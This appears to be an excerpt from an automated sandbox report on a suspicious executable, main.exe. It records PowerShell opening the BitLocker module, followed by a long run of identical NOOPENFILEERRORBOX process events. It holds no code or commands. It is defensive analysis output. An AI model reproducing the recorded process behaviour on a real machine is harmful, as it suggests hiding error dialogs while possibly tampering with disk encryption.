Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\main.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
